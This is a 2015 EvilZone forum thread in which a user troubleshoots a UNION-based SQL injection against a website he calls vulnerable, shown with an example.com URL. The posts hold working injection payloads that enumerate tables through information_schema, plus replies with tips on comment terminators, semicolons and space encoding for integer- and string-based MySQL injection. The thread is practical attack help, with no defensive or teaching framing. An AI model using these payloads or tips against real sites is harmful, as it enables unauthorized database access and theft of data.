EvilZone

Programming and Scripting => Web Oriented Coding => Topic started by: $Clone on July 19, 2015, 05:35:12 AM

Title: sqli error
Post by: $Clone on July 19, 2015, 05:35:12 AM

hey there am try to test for sqli in a website where i have found table to be vulnerable. the url is
http://www.example.com/test.php?id=null UNION SELECT 1,group_concat(table_NAME),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database--

i get error:

Code: [Select]

invalid query: You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '-' at line 1
i have tried removing the -- but i don't get how??/ :-\ its not working.....

Title: Re: sqli error
Post by: andmuchmore on July 20, 2015, 05:56:51 AM

Have you tried different comment types?
# or /* instead of -- ect?

Title: Re: sqli error
Post by: sh4d0w_w4tch on July 20, 2015, 08:59:42 AM

You need to include ; before the comment.  As was mentioned, try using different comment types.

Title: Re: sqli error
Post by: Stackprotector on July 20, 2015, 11:33:50 AM

^ this and try to include + instead of spaces.

Title: Re: sqli error
Post by: $Clone on July 20, 2015, 12:11:53 PM

actually i notice once you get the vul tables you just put
www.example.com/index.php?id=null UNION SELECT 1,table_NAME,3,4,5,6,7,8,9,10 from information_schema.tables-- and it worked fine

Title: Re: sqli error
Post by: Vellichor on August 13, 2015, 02:03:33 PM

-- is sufficient for normal integer based injection
--+-+ / -- - is required upon handling string-based injection
all speaking MySQL>=5